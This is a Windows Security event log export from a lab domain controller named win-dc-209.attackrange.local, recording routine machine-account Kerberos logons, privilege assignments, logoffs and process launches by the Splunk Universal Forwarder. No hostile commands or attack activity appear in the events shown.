SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264944
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8934D1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53845
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264943
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8934D1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:47:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264946
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264948
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264947
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bdc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264949
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1890
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264950
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264952
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264951
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264958
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8974FC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264957
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8974FC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53854
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264956
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8974FC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264955
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x897490
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264954
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x897490
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53853
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264953
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x897490
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:47:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264961
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x898125
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:47:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264960
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x898125
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53861
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:47:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264959
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x898125
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:48:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264962
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264964
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264963
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264965
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264966
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264968
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x183c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
